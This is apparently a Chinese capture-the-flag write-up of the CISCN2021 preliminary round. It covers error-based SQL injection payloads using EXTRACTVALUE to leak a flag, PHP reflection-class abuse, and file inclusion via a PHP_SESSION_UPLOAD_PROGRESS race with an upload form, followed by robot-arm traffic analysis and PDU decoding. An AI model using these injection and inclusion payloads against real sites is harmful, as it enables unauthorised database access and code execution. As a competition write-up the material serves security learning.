[CISCN2021]初赛

easy_sql

无列名和报错注入

uname=123&passwd=123') AND EXTRACTVALUE(1,CONCAT(0x5e,(select * from (select * from flag as a join flag as b using(no,id))x)))--+

[CISCN2021]初赛_第1张图片
出了字段名1d004bae-a9e9-4f4e-8af1-c9518d464307

uname=qwe&passwd=') AND EXTRACTVALUE(1,CONCAT(0x5e,(select RIGHT(`column`,31) from flag)))--+

[CISCN2021]初赛_第2张图片
出了后段^rgiXT-97SMk-yiGwB-Ithem-Ozeer-}

flag还挺长,再出个前段CISCN{rgiXT-97SMk-yiGwB-Ithem-O
[CISCN2021]初赛_第3张图片

easy_source

原题

这题考察了php原生类的使用,参考ctfshow的web100

使用反射类new ReflectionClass("类名"),获得这个类的信息


/?rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment

[CISCN2021]初赛_第4张图片

middle_source


    highlight_file(__FILE__);
    echo "your flag is in some file in /etc ";
    $fielf=$_POST["field"];
    $cf="/tmp/app_auth/cfile/".$_POST['cf'];
    
    if(file_exists($cf)){
     
        include $cf;
        echo $$field;
        exit;
    }
    else{
     
        echo "";
        exit;
    }
?>

PHP_SESSION_UPLOAD_PROGRESS加条件竞争进行文件包含

参考之前做的ctfshow的web 82-86

这里有phpinfo

field=1&cf=../../../var/www/html/you_can_seeeeeeee_me.php

在这里插入图片描述
拿到session的目录:/var/lib/php/sessions/eciaadedie/

post包:


<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Documenttitle>
head>
<body>
    <form action="http://114.116.248.145:24429/" method="POST" enctype="multipart/form-data">
        <input type="text" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
        <input type="file" name="file" />
        <input type="submit" value="submit" />
    form>
body>
html>

用bp,暴力请求session文件包

field=field&cf=../../../var/lib/php/sessions/eciaadedie/sess_flag&a=§1§

因为这里的内容会被包含,所以我们直接搞一个php代码块,读取目录
[CISCN2021]初赛_第5张图片
读到/etc,他说有一个奇奇怪怪的文件夹,那这个eaijbefcfb最奇怪了

  string(4) "dpkg"
  [25]=>
  string(10) "eaijbefcfb"
  [26]=>
  string(11) "environment"
  [27]=>

用一直往后打,最后换上file_get_content()就好了
[CISCN2021]初赛_第6张图片

[CISCN2021]初赛_第7张图片

robot

装了一个RobotStudio插件,可以打开repag文件
是一个机械臂
[CISCN2021]初赛_第8张图片
需要我们分析流量包来判断他写了什么东西

首先我们打开模拟,然后打开这个exe文件,发现可以连接了
试着写一点东西看看,发现连接上后,写了什么东西,机器臂就会跟着写一下
[CISCN2021]初赛_第9张图片
我们抓包看看,抓这个蓝牙的包
随便点一下,抓一个包,看下是什么样的
看下怎么读取他的内容
[CISCN2021]初赛_第10张图片
追踪一下流果然找到坐标
[CISCN2021]初赛_第11张图片
直接保存这些信息
用脚本提取出所有坐标

import re

with open('1.txt','r') as file:
    while True:
        data = file.readline()
        all = re.findall('\[\d+\,\d+\,\d+\]', data)
        all += all
        if all != []:
            print(all)
        while len(data) == 0:
            
            break

根据每次写完都是-10结尾,这样分下段
[CISCN2021]初赛_第12张图片

'[27,36,0]', '[28,35,0]', '[29,35,0]', '[31,35,0]', '[32,35,0]', '[33,35,0]', '[35,35,0]', '[36,35,0]', '[37,35,0]', '[39,34,0]', '[40,34,0]', '[41,33,0]', '[42,32,0]', '[43,32,0]', '[45,32,0]', '[47,31,0]', '[48,29,0]', '[49,28,0]', '[49,27,0]', '[50,26,0]', '[50,25,0]', '[51,23,0]', '[51,22,0]', '[51,21,0]', '[52,20,0]', '[52,19,0]', '[52,18,0]', '[52,17,0]', '[52,16,0]', '[52,15,0]', '[51,14,0]', '[50,14,0]', '[49,14,0]', '[48,14,0]', '[47,14,0]', '[46,14,0]', '[45,14,0]', '[44,14,0]', '[43,14,0]', '[42,14,0]', '[40,14,0]', '[39,14,0]', '[37,14,0]', '[35,14,0]', '[34,14,0]', '[32,14,0]', '[30,14,0]', '[28,14,0]', '[27,14,0]', '[26,14,0]', '[25,14,0]', '[24,14,0]', '[23,14,0]', '[22,14,0]', '[21,15,0]', '[20,16,0]', '[19,17,0]', '[18,19,0]', '[18,21,0]', '[18,22,0]', '[18,23,0]', '[18,24,0]', '[18,26,0]', '[18,27,0]', '[18,28,0]', '[18,30,0]', '[18,32,0]', '[18,33,0]', '[18,34,0]', '[19,37,0]', '[21,39,0]', '[21,40,0]', '[22,42,0]', '[24,44,0]', '[24,45,0]', '[26,47,0]', '[27,48,0]', '[28,49,0]', '[29,50,0]', '[30,51,0]', '[31,52,0]', '[33,53,0]', '[34,53,0]', '[35,54,0]', '[36,54,0]', '[37,54,0]', '[38,54,0]', '[39,54,0]', '[40,54,0]', '[41,54,0]', '[44,54,0]', '[46,54,0]', '[48,54,0]', '[50,54,0]', '[52,53,0]', '[53,53,0]', '[54,52,0]', '[55,52,0]', '[56,52,0]', '[58,51,0]', '[59,50,0]', '[61,49,0]', '[62,49,0]', '[64,47,0]', '[65,47,0]', '[67,46,0]', '[68,46,0]', '[70,45,0]', '[71,44,0],'[71,44,0]'


 '[125,23,0]', '[125,23,0]', '[124,22,0]', '[123,22,0]', '[121,21,0]', '[118,20,0]', '[115,19,0]', '[113,19,0]', '[112,18,0]', '[111,18,0]', '[109,17,0]', '[106,16,0]', '[104,16,0]', '[103,16,0]', '[102,15,0]', '[101,15,0]', '[100,15,0]', '[99,15,0]', '[98,15,0]', '[97,15,0]', '[96,15,0]', '[95,15,0]', '[94,15,0]', '[93,15,0]', '[92,15,0]', '[91,15,0]', '[89,15,0]', '[87,17,0]', '[85,18,0]', '[85,19,0]', '[84,21,0]', '[83,21,0]', '[82,22,0]', '[82,23,0]', '[81,24,0]', '[81,26,0]', '[80,28,0]', '[80,29,0]', '[80,31,0]', '[80,32,0]', '[79,34,0]', '[79,35,0]', '[79,37,0]', '[79,39,0]', '[79,41,0]', '[79,43,0]', '[79,44,0]', '[79,46,0]', '[79,47,0]', '[80,48,0]', '[81,49,0]', '[82,50,0]', '[84,50,0]', '[87,51,0]', '[88,51,0]', '[90,51,0]', '[91,51,0]', '[93,51,0]', '[94,51,0]', '[97,51,0]', '[100,50,0]', '[101,49,0]', '[102,49,0]', '[103,48,0]', '[105,46,0]', '[106,45,0]', '[108,43,0]', '[109,42,0]', '[110,41,0]', '[111,39,0]', '[112,38,0]', '[112,36,0]', '[113,34,0]', '[114,33,0]', '[115,32,0]', '[115,31,0]', '[116,30,0]', '[117,28,0]', '[118,27,0]', '[118,28,0]', '[117,30,0]', '[116,32,0]', '[115,34,0]', '[115,36,0]', '[114,39,0]', '[114,41,0]', '[114,43,0]', '[114,45,0]', '[114,47,0]', '[114,48,0]', '[114,50,0]', '[114,52,0]', '[114,53,0]', '[115,54,0]', '[116,55,0]', '[117,56,0]', '[118,57,0]', '[120,57,0]', '[122,57,0]', '[124,57,0]', '[126,57,0]', '[128,57,0]', '[131,57,0]', '[133,57,0]', '[136,57,0]', '[138,57,0]', '[141,57,0]', '[143,56,0]', '[145,55,0]', '[147,53,0]', '[149,52,0]', '[150,52,0]', '[152,50,0]', '[153,49,0]', '[155,47,0]', '[156,46,0]', '[157,45,0]','[157,45,-10]'


'[212,24,0]', '[212,24,0]', '[213,23,0]', '[211,21,0]', '[210,20,0]', '[209,19,0]', '[208,18,0]', '[207,17,0]', '[206,16,0]', '[205,15,0]', '[204,15,0]', '[201,14,0]', '[200,14,0]', '[199,14,0]', '[197,14,0]', '[196,14,0]', '[195,14,0]', '[193,14,0]', '[191,14,0]', '[189,16,0]', '[188,16,0]', '[187,16,0]', '[186,17,0]', '[185,17,0]', '[183,18,0]', '[183,20,0]', '[183,21,0]', '[182,22,0]', '[182,23,0]', '[182,24,0]', '[182,25,0]', '[182,26,0]', '[182,27,0]', '[182,29,0]', '[183,31,0]', '[184,32,0]', '[186,33,0]', '[187,34,0]', '[188,34,0]', '[189,35,0]', '[190,35,0]', '[192,36,0]', '[194,37,0]', '[196,37,0]', '[198,38,0]', '[199,38,0]', '[200,38,0]', '[201,38,0]', '[202,39,0]', '[203,39,0]', '[204,40,0]', '[207,41,0]', '[207,42,0]', '[208,43,0]', '[208,44,0]', '[208,45,0]', '[208,46,0]', '[208,48,0]', '[208,50,0]', '[208,51,0]', '[207,53,0]', '[207,54,0]', '[206,56,0]', '[204,58,0]', '[203,60,0]', '[202,61,0]', '[201,62,0]', '[201,63,0]', '[200,64,0]', '[199,64,0]', '[198,64,0]', '[197,65,0]', '[196,65,0]', '[195,65,0]', '[193,65,0]', '[192,65,0]', '[190,65,0]', '[189,65,0]', '[187,65,0]', '[185,65,0]', '[184,65,0]', '[183,65,0]', '[181,64,0]', '[180,63,0]', '[179,63,0]', '[178,62,0]', '[177,62,0]', '[175,61,0]', '[174,60,0]', '[173,59,0]', '[173,59,-10]'

'[243,20,0]', '[243,20,0]', '[244,19,0]', '[244,21,0]', '[244,25,0]', '[245,26,0]', '[245,29,0]', '[247,32,0]', '[247,34,0]', '[248,36,0]', '[248,37,0]', '[249,39,0]', '[250,40,0]', '[251,42,0]', '[251,43,0]', '[252,44,0]', '[254,44,0]', '[256,44,0]', '[258,44,0]', '[260,42,0]', '[262,41,0]', '[263,40,0]', '[265,38,0]', '[266,35,0]', '[267,32,0]', '[268,30,0]', '[271,27,0]', '[272,25,0]', '[273,22,0]', '[274,21,0]', '[275,20,0]', '[275,19,0]', '[274,18,0]', '[274,20,0]', '[272,22,0]', '[271,23,0]', '[271,26,0]', '[268,29,0]', '[266,33,0]', '[266,35,0]', '[265,37,0]', '[263,40,0]', '[262,42,0]', '[262,44,0]', '[261,47,0]', '[260,49,0]', '[259,51,0]', '[258,55,0]', '[258,56,0]', '[257,58,0]', '[255,61,0]', '[254,62,0]', '[253,63,0]', '[253,64,0]', '[252,65,0]', '[251,66,0]', '[250,67,0]', '[249,68,0]', '[248,69,0]', '[247,70,0]', '[246,71,0]', '[245,72,0]', '[244,73,0]','[244,73,-10]',


'[298,64,0]', '[298,64,0]', '[299,65,0]', '[300,65,0]', '[302,65,0]', '[304,65,0]', '[306,65,0]', '[308,65,0]', '[309,65,0]', '[312,65,0]', '[315,65,0]', '[317,65,0]', '[319,65,0]', '[322,65,0]', '[325,65,0]', '[327,65,0]', '[330,65,0]', '[332,65,0]', '[334,66,0]', '[335,66,0]',  '[335,66,-10]'


'[20,103,0]', '[20,104,0]', '[20,107,0]', '[20,110,0]', '[20,112,0]', '[20,114,0]', '[20,118,0]', '[19,121,0]', '[18,124,0]', '[17,126,0]', '[17,130,0]', '[17,134,0]', '[17,137,0]', '[17,139,0]', '[17,142,0]', '[17,143,0]', '[17,146,0]', '[17,147,0]', '[17,149,0]', '[17,150,0]', '[17,149,0]', '[17,148,0]', '[17,146,0]', '[18,145,0]', '[18,143,0]', '[19,142,0]', '[20,141,0]', '[20,140,0]', '[21,138,0]', '[21,137,0]', '[22,135,0]', '[23,134,0]', '[24,132,0]', '[25,131,0]', '[26,129,0]', '[27,128,0]', '[28,127,0]', '[29,126,0]', '[31,125,0]', '[32,124,0]', '[32,123,0]', '[34,121,0]', '[35,120,0]', '[37,120,0]', '[38,119,0]', '[40,118,0]', '[41,118,0]', '[43,117,0]', '[44,116,0]', '[46,115,0]', '[48,115,0]', '[49,114,0]', '[50,113,0]', '[51,113,0]', '[52,112,0]', '[52,112,-10]'


'[80,121,0]', '[80,121,0]', '[79,120,0]', '[78,121,0]', '[77,122,0]', '[77,123,0]', '[77,124,0]', '[76,127,0]', '[75,128,0]', '[74,129,0]', '[73,131,0]', '[73,132,0]', '[73,133,0]', '[72,135,0]', '[72,136,0]', '[72,137,0]', '[72,138,0]', '[72,139,0]', '[72,140,0]', '[72,142,0]', '[72,144,0]', '[72,145,0]', '[73,148,0]', '[74,149,0]', '[77,150,0]', '[78,150,0]', '[80,151,0]', '[81,151,0]', '[82,151,0]', '[83,151,0]', '[84,151,0]', '[85,151,0]', '[87,151,0]', '[89,151,0]', '[90,151,0]', '[92,150,0]', '[93,150,0]', '[95,149,0]', '[97,147,0]', '[98,146,0]', '[99,146,0]', '[100,145,0]', '[101,144,0]', '[102,142,0]', '[102,141,0]', '[104,139,0]', '[104,138,0]', '[105,136,0]', '[105,135,0]', '[105,133,0]', '[105,132,0]', '[105,131,0]', '[105,129,0]', '[104,128,0]', '[103,126,0]', '[102,126,0]', '[101,125,0]', '[98,123,0]', '[96,123,0]', '[95,123,0]', '[93,123,0]', '[92,122,0]', '[90,121,0]', '[89,121,0]', '[86,120,0]','[86,120,-10]'


'[147,98,0]', '[147,98,0]', '[146,99,0]', '[145,100,0]', '[144,103,0]', '[143,104,0]', '[142,105,0]', '[142,106,0]', '[142,109,0]', '[142,111,0]', '[142,114,0]', '[141,118,0]', '[140,120,0]', '[139,123,0]', '[138,127,0]', '[138,129,0]', '[137,133,0]', '[135,135,0]', '[134,137,0]', '[133,139,0]', '[131,142,0]', '[131,143,0]', '[131,145,0]', '[130,146,0]', '[129,149,0]', '[128,152,0]', '[128,153,0]', '[127,156,0]', '[127,157,0]', '[126,158,0]', '[127,157,0]', '[129,157,0]', '[130,156,0]', '[132,156,0]', '[134,155,0]', '[137,153,0]', '[138,152,0]', '[139,151,0]', '[140,150,0]', '[143,149,0]', '[144,148,0]', '[145,147,0]', '[146,146,0]', '[147,145,0]', '[149,144,0]', '[149,143,0]', '[150,142,0]', '[151,141,0]', '[152,140,0]', '[152,139,0]', '[153,138,0]', '[153,137,0]', '[153,136,0]', '[153,135,0]', '[153,134,0]', '[153,133,0]', '[152,132,0]', '[151,131,0]', '[150,131,0]', '[149,130,0]', '[147,129,0]','[147,129,-10]',


 '[186,136,0]', '[186,136,0]', '[183,137,0]', '[182,138,0]', '[182,139,0]', '[182,140,0]', '[181,142,0]', '[179,144,0]', '[179,145,0]', '[179,147,0]', '[178,149,0]', '[177,150,0]', '[177,151,0]', '[177,152,0]', '[177,154,0]', '[177,156,0]', '[177,157,0]', '[177,158,0]', '[178,160,0]', '[179,161,0]', '[180,162,0]', '[181,163,0]', '[182,164,0]', '[184,164,0]', '[186,164,0]', '[187,164,0]', '[188,164,0]', '[190,163,0]', '[191,162,0]', '[192,162,0]', '[194,160,0]', '[196,159,0]', '[197,158,0]', '[197,156,0]', '[198,155,0]', '[200,153,0]', '[200,152,0]', '[201,150,0]', '[201,149,0]', '[201,148,0]', '[201,147,0]', '[201,145,0]', '[201,144,0]', '[201,142,0]', '[201,141,0]', '[201,139,0]', '[201,138,0]', '[200,136,0]', '[199,135,0]', '[198,135,0]', '[197,135,0]', '[196,135,0]', '[195,135,0]', '[193,135,0]', '[192,135,0]', '[190,135,0]', '[189,135,0]', '[189,135,-10]'


'[223,167,0]', '[223,167,0]', '[224,167,0]', '[226,167,0]', '[228,167,0]', '[229,167,0]', '[232,167,0]', '[233,167,0]', '[234,167,0]', '[235,167,0]', '[237,167,0]', '[238,167,0]', '[240,167,0]', '[241,167,0]', '[243,167,0]', '[244,167,0]', '[246,167,0]', '[247,167,0]', '[250,168,0]', '[251,168,0]', '[252,168,0]', '[253,168,0]', '[254,168,0]','[254,168,-10]'


 '[269,135,0]', '[271,136,0]', '[273,138,0]', '[275,140,0]', '[276,141,0]', '[278,143,0]', '[280,145,0]', '[282,147,0]', '[284,149,0]', '[285,150,0]', '[288,152,0]', '[289,153,0]', '[291,154,0]', '[293,156,0]', '[294,157,0]', '[296,159,0]', '[297,160,0]', '[298,161,0]', '[299,162,0]','[299,162,-10]',


 '[300,136,0]', '[299,136,0]', '[297,137,0]', '[296,138,0]', '[294,141,0]', '[294,142,0]', '[293,144,0]', '[293,145,0]', '[292,148,0]', '[291,149,0]', '[290,151,0]', '[288,153,0]', '[288,155,0]', '[287,156,0]', '[286,157,0]', '[285,159,0]', '[284,160,0]', '[283,161,0]', '[282,162,0]', '[281,163,0]', '[280,164,0]', '[279,165,0]','[279,165,-10]',


 '[327,142,0]', '[328,143,0]', '[330,145,0]', '[332,148,0]', '[333,149,0]', '[335,151,0]', '[337,154,0]', '[339,156,0]', '[341,158,0]', '[342,159,0]', '[345,160,0]', '[347,161,0]', '[348,162,0]', '[350,164,0]', '[351,165,0]', '[352,166,0]', '[355,168,0]', '[356,169,0]','[356,169,-10]',


 '[351,143,0]', '[350,143,0]', '[348,144,0]', '[347,144,0]', '[346,145,0]', '[343,148,0]', '[341,150,0]', '[339,152,0]', '[336,155,0]', '[333,158,0]', '[330,159,0]', '[327,162,0]', '[325,165,0]', '[323,167,0]', '[322,168,0]', '[319,170,0]', '[317,171,0]', '[316,171,0]', '[314,172,0]', '[313,172,0]','[313,172,-10]'

再画散点图

#导入必要的模块 
import matplotlib.pyplot as plt 

with open('2.txt','r') as n:
    all = n.read()
    a = all.split("], [")

x_value = []
y_value = []

for i in a:
    i = i.split(", ")
    x_value.append(int(i[0]))
    y_value.append(int(i[1]))
    if i[2] == '-10':
        plt.scatter(x_value,y_value)
        x_value = []
        y_value = []

plt.savefig('flag.png')

md5加密即可
[CISCN2021]初赛_第13张图片

隔空传话

pdu加密:
15030442
在这里插入图片描述
在这里插入图片描述
第五行开始,解出来的全是16进制
[CISCN2021]初赛_第14张图片
按时间排序,用010写进去,得到图片
CISCN{15030442_b586_4c9e_b436_26def12293e4}

你可能感兴趣的:(比赛wp)